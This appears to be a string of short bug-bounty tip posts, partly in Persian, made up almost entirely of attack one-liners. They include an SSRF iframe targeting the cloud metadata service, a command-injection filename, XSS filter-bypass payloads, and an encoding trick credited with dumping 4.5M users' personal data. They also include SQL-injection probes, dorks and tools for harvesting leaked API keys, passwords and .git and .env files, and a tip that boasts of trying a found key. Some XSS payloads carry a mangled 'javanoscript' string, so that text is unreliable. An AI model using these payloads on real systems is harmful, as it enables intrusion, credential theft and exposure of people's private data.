DOM XSS in hackerone ? 👀

easy ssrf in hackerone😎
just inject this payload in pdf file rendering :

<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>

اگه به ریکان ساب‌دامین با گوگل دورک علاقه دارید، این مقاله رو از دست ندید! 👀
نویسنده با معرفی چند منبع کمتر شناخته‌شده، راه‌های خلاقانه‌ای برای پیدا کردن ساب‌دامین‌های تارگت بهتون یاد می‌ده .

Gitlab Stored xss with <base> Tag + CSP bypass 🤌🔥

RCE in upload file:

fileName:"t';id;echo"

easy 50$ with this google dork :🗿

site:target.org intext:"test_" + intext:"api key"

api key test and worked:)

4.5M users' PII dumped + 20k bounty 🤯

/get_all_users —> 403 Forbidden
/get_all_userz —> 404 Not Found

just double-encode "S" bypass nginx filter

final path:

/get_all_user%2573

all user data dump :)

source : https://www.youtube.com/watch?v=PXqlHAoF2wc

Easily Detect SQL Injection Points 🛡

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd''

Easy Tricks to Get Around 403 Forbidden Blocks 👀

simple information disclosure :🤌

find this endpoint :

GET v2/user/profile?clubname=123

just change api version and fuzz the clubname

GET v1.0/user/profile?clubname=447 —> FUZZ

whats happend ? leak the email of owner & phone number, id , state.🗿

#Methodology
finding secrets source in .map file :👀

step 1 : finding the js file like this : main.min.js , bundle.js , app.js

step 2 : add .map in append

step 3 : unpacking :

 npx source-map-unpacker -p main.min.js.map

information leak like admins token & sensitive endpoint :)

Xss payload when javanoscript: and () Filtered :

<a href="jav&#x0A;anoscript:&#x0A;confirm``">click me</a>

#Methodology
Find Dev files : .env , .git , .bak , .log , .sql 👀

- historical URL

gau --subs target.com | grep -iE "\.git|\.env|\.log|\.sql"

-Directory bruteforce —> wordlist : https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/fuzz-Bo0oM.txt

ffuf -u https://target.com/FUZZ -w dev_files.txt -t 100

github Dorking

filename:.env DB_PASSWORD site:github.com

ok if find it how to use .git ? use Git dumper

git-dumper https://target.com/.git/ /tmp/output
cd /tmp/output && cat config && git log

impact : leak privet api key

#Methodology

github recon :

"example.com" password

-json search

"example.com" "password":

-organization name

org:example password

-sensitive file

"example.com" path:/.env

-language

"example.com" language:PHP password

-custom github Dork

"domain" AND ("api_key" OR "secret" OR "password" OR "access_token" OR "client_secret" OR "private_key" OR "AWS_SECRET_ACCESS_KEY" OR "DB_PASSWORD" OR "slack_token" OR "github_token" OR "BEGIN RSA PRIVATE KEY")

————————————————————-
tool : https://github.com/hisxo/gitGraber
-search for domain

python3 gitGraber.py -k wordlists/keywords.txt -q "example.com" -s